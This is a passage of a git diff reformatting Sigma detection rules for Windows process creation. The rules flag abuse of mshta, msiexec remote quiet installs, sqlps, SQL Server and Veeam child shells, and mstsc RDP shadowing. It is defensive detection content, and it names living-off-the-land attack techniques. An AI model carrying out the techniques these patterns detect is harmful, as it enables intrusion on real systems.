b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Suspicious MSHTA Child Process id: 03cc0c25-389f-4bf8-b48d-11878079f1ca status: test -description: Detects a suspicious process spawning from an "mshta.exe" process, which - could be indicative of a malicious HTA script execution +description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution references: - https://www.trustedsec.com/july-2015/malicious-htas/ author: Michael Haag @@ -25,27 +24,27 @@ detection: selection_parent: ParentImage|endswith: \mshta.exe selection_child: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - \bitsadmin.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe - - cscript.exe - - Bash.exe - - reg.exe - - REGSVR32.EXE - - bitsadmin.exe + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - \bitsadmin.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe + - cscript.exe + - Bash.exe + - reg.exe + - REGSVR32.EXE + - bitsadmin.exe condition: process_creation and (all of selection*) falsepositives: - Printer software / driver installations diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml index 4649e077a..f1437cb23 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml @@ -1,8 +1,7 @@ title: MSHTA Suspicious Execution 01 id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3 status: test -description: Detection for mshta.exe suspicious execution patterns sometimes involving - file polyglotism +description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism references: - http://blog.sevagas.com/?Hacking-around-HTA-files - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356 @@ -29,18 +28,19 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \mshta.exe - CommandLine|contains: + CommandLine|contains: - vbscript - .jpg - .png - .lnk + # - '.chm' # could be prone to false positives - .xls - .doc - .zip - .dll + # - '.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml index a3e1b78ea..c9dfb7112 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml @@ -21,9 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_susp: + # Suspicious parents ParentImage|endswith: - \cmd.exe - \cscript.exe @@ -32,23 +33,26 @@ detection: - \regsvr32.exe - \rundll32.exe - \wscript.exe - CommandLine|contains: + # Suspicious folders + CommandLine|contains: - \AppData\Local\ - C:\ProgramData\ - C:\Users\Public\ - C:\Windows\Temp\ filter_img: - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - CommandLine|contains: - - .htm - - .hta - - CommandLine|endswith: - - mshta.exe - - mshta - condition: process_creation and (all of selection_* or (selection_img and not - filter_img)) + # Filter legit Locations + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + # Suspicious extensions + - CommandLine|contains: + - .htm + - .hta + # Filter simple execution + - CommandLine|endswith: + - mshta.exe + - mshta + condition: process_creation and (all of selection_* or (selection_img and not filter_img)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml index cdb12d335..ddcdcaaf5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml @@ -21,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /z ' - ' -z ' selection_dll: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml index 696f3c54f..170aa7e77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml @@ -1,8 +1,7 @@ title: Suspicious MsiExec Embedding Parent id: 4a2a2c3e-209f-4d01-b513-4155a540b469 status: test -description: Adversaries may abuse msiexec.exe to proxy the execution of malicious - payloads +description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 @@ -29,12 +28,12 @@ detection: - '-Embedding ' filter_splunk_ufw: Image|endswith: :\Windows\System32\cmd.exe - CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ + CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ filter_vs: - - CommandLine|contains: \DismFoDInstall.cmd - - ParentCommandLine|contains|all: - - '\MsiExec.exe -Embedding ' - - Global\MSI0000 + - CommandLine|contains: \DismFoDInstall.cmd + - ParentCommandLine|contains|all: + - '\MsiExec.exe -Embedding ' + - Global\MSI0000 condition: process_creation and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml index f6191b9df..1e8b01908 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml @@ -1,12 +1,9 @@ title: Suspicious Msiexec Execute Arbitrary DLL id: 6f4191bb-912b-48a8-9ce7-682769541e6d status: test -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -27,23 +24,23 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \msiexec.exe - CommandLine|contains: + CommandLine|contains: - ' /y' - ' -y' filter_apple: - CommandLine|contains: + CommandLine|contains: - \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" /Y "C:\Windows\CCM\ - - \MsiExec.exe" /Y C:\Windows\CCM\ + - \MsiExec.exe" /Y C:\Windows\CCM\ # also need non-quoted execution - \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" -Y "C:\Windows\CCM\ - - \MsiExec.exe" -Y C:\Windows\CCM\ + - \MsiExec.exe" -Y C:\Windows\CCM\ # also need non-quoted execution condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Legitimate script diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml index b74d808cd..1b4c83238 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml @@ -1,12 +1,9 @@ title: Msiexec Quiet Installation id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 status: experimental -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -26,10 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -39,10 +38,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q filter_user_temp: + # The %temp% is a very common location for installers ParentImage|startswith: C:\Users\ ParentImage|contains: \AppData\Local\Temp\ filter_system_temp: diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml index 6f5eac593..163935ff1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml @@ -1,8 +1,8 @@ title: Suspicious Msiexec Quiet Install From Remote Location id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c related: - - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f - type: similar + - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f + type: similar status: test description: Detects usage of Msiexec.exe to install packages hosted remotely quietly references: @@ -21,10 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -34,11 +36,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q selection_remote: - CommandLine|contains: + CommandLine|contains: - http - \\\\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml index b667dde7e..744744198 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml @@ -19,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe filter: Image|startswith: - C:\Windows\System32\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml index 05adbba82..875f6bdc6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml @@ -1,8 +1,8 @@ title: MsiExec Web Install id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f related: - - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c - type: similar + - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c + type: similar status: test description: Detects suspicious msiexec process starts with web addresses as parameter references: @@ -24,12 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' msiexec' - :// condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml b/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml index 6cd340171..124079ba6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MSOHTMED.exe - - OriginalFileName: MsoHtmEd.exe + - Image|endswith: \MSOHTMED.exe + - OriginalFileName: MsoHtmEd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml b/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml index e770e662c..3ef070d02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via MSPUB.EXE id: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf status: test -description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary - files +description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MSPUB.exe - - OriginalFileName: MSPUB.exe + - Image|endswith: \MSPUB.exe + - OriginalFileName: MSPUB.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml b/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml index e75b362a2..af449b8ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml @@ -1,10 +1,7 @@ title: Potential Process Injection Via Msra.EXE id: 744a188b-0415-4792-896f-11ddb0588dbc status: test -description: Detects potential process injection via Microsoft Remote Asssistance - (Msra.exe) by looking at suspicious child processes spawned from the aforementioned - process. It has been a target used by many threat actors and used for discovery - and persistence tactics +description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics references: - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/ - https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml index 6876c217a..991e866aa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml @@ -1,14 +1,9 @@ title: Detection of PowerShell Execution via Sqlps.exe id: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 status: test -description: 'This rule detects execution of a PowerShell code through the sqlps.exe - utility, which is included in the standard set of utilities supplied with the - MSSQL Server. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/ @@ -32,14 +27,12 @@ detection: selection_parent: ParentImage|endswith: \sqlps.exe selection_image: - - Image|endswith: \sqlps.exe - - OriginalFileName: sqlps.exe + - Image|endswith: \sqlps.exe + - OriginalFileName: sqlps.exe filter_image: ParentImage|endswith: \sqlagent.exe - condition: process_creation and (selection_parent or (selection_image and not - filter_image)) + condition: process_creation and (selection_parent or (selection_image and not filter_image)) falsepositives: - - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe - spawned by sqlagent.exe is a legitimate action. + - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml index bf780a1b1..b4f662969 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml @@ -1,14 +1,9 @@ title: SQL Client Tools PowerShell Session Detection id: a746c9b8-a2fb-4ee5-a428-92bee9e99060 status: test -description: 'This rule detects execution of a PowerShell code through the sqltoolsps.exe - utility, which is included in the standard set of utilities supplied with the - Microsoft SQL Server Management studio. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml - https://twitter.com/pabraeken/status/993298228840992768 @@ -29,14 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \sqltoolsps.exe - - ParentImage|endswith: \sqltoolsps.exe - - OriginalFileName: \sqltoolsps.exe + - Image|endswith: \sqltoolsps.exe + - ParentImage|endswith: \sqltoolsps.exe + - OriginalFileName: \sqltoolsps.exe filter: ParentImage|endswith: \smss.exe condition: process_creation and (selection and not filter) falsepositives: - - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess - sqltoolsps.exe spawned by smss.exe is a legitimate action. + - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml index 4aaf82634..f73bc8b4c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of SQL Server id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 related: - - id: 344482e4-a477-436c-aa70-7536d18a48c7 - type: obsoletes + - id: 344482e4-a477-436c-aa70-7536d18a48c7 + type: obsoletes status: experimental -description: Detects suspicious child processes of the SQLServer process. This could - indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2023/05/04 @@ -26,6 +25,7 @@ detection: selection: ParentImage|endswith: \sqlservr.exe Image|endswith: + # You can add other uncommon or suspicious processes - \bash.exe - \bitsadmin.exe - \cmd.exe @@ -44,7 +44,7 @@ detection: ParentImage|startswith: C:\Program Files\Microsoft SQL Server\ ParentImage|endswith: DATEV_DBENGINE\MSSQL\Binn\sqlservr.exe Image: C:\Windows\System32\cmd.exe - CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' + CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' condition: process_creation and (selection and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml index fbce1cf3a..6a01c82a3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of Veeam Dabatase id: d55b793d-f847-4eea-b59a-5ab09908ac90 related: - - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 - type: similar + - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 + type: similar status: experimental -description: Detects suspicious child processes of the Veeam service process. This - could indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -32,7 +31,7 @@ detection: - \pwsh.exe - \wsl.exe - \wt.exe - CommandLine|contains: + CommandLine|contains: - '-ex ' - bypass - cscript diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml index 57b4584e6..0ad11a25f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - noconsentprompt - 'shadow:' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml index f7d332b31..82a453241 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml @@ -1,13 +1,9 @@ title: New Remote Desktop Connection Initiated Via Mstsc.EXE id: 954f0af7-62dd-418f-b3df-a84bc2c7a774 status: test -description: 'Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection - to a remote server. - - Adversaries may use valid accounts to log into a computer using the Remote Desktop - Protocol (RDP). The adversary may then perform actions as the logged-on user. - - ' +description: | + Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. + Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc @@ -26,13 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|contains: ' /v:' + CommandLine|contains: ' /v:' filter_optional_wsl: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp ParentImage: C:\Windows\System32\lxss\wslhost.exe - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - WSL (Windows Sub System For Linux) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml index c3aac68da..5d844fd13 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml @@ -20,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" filter_optional_wsl: ParentImage: C:\Windows\System32\lxss\wslhost.exe - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Likely with legitimate usage of ".rdp" files diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml index 1296dd381..31261e9ca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Mstsc.EXE Execution With Local RDP File id: 6e22722b-dfb1-4508-a911-49ac840b40f8 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -20,14 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_extension: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" selection_paths: - CommandLine|contains: + # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env + CommandLine|contains: - :\Users\Public\ - :\Windows\System32\spool\drivers\color - ':\Windows\System32\Tasks_Migrated ' @@ -35,7 +35,8 @@ detection: - :\Windows\Temp\ - :\Windows\Tracing\ - \AppData\Local\Temp\ - - \Downloads\ + # - '\Desktop\' # Could be source of FP depending on the environment + - \Downloads\ # Could be source of FP depending on the environment condition: process_creation and (all of selection_*) falsepositives: - Likelihood is related to how often the paths are used in the environment diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml index aa7b73cc2..c0202d846 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml @@ -1,8 +1,7 @@ title: Mstsc.EXE Execution From Uncommon Parent id: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Covers potential downloads/clicks from browsers - \brave.exe - \CCleanerBrowser.exe - \chrome.exe @@ -32,10 +32,11 @@ detection: - \opera.exe - \vivaldi.exe - \whale.exe + # Covers potential downloads/clicks from email clients - \outlook.exe selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml index a8b00178e..0ab372d9f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml @@ -1,14 +1,9 @@ title: Msxsl.EXE Execution id: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 status: test -description: 'Detects the execution of the MSXSL utility. This can be used to execute - Extensible Stylesheet Language (XSL) files. These files are commonly used to describe - the processing and rendering of data within XML files. - - Adversaries can abuse this functionality to execute arbitrary files while potentially - bypassing application 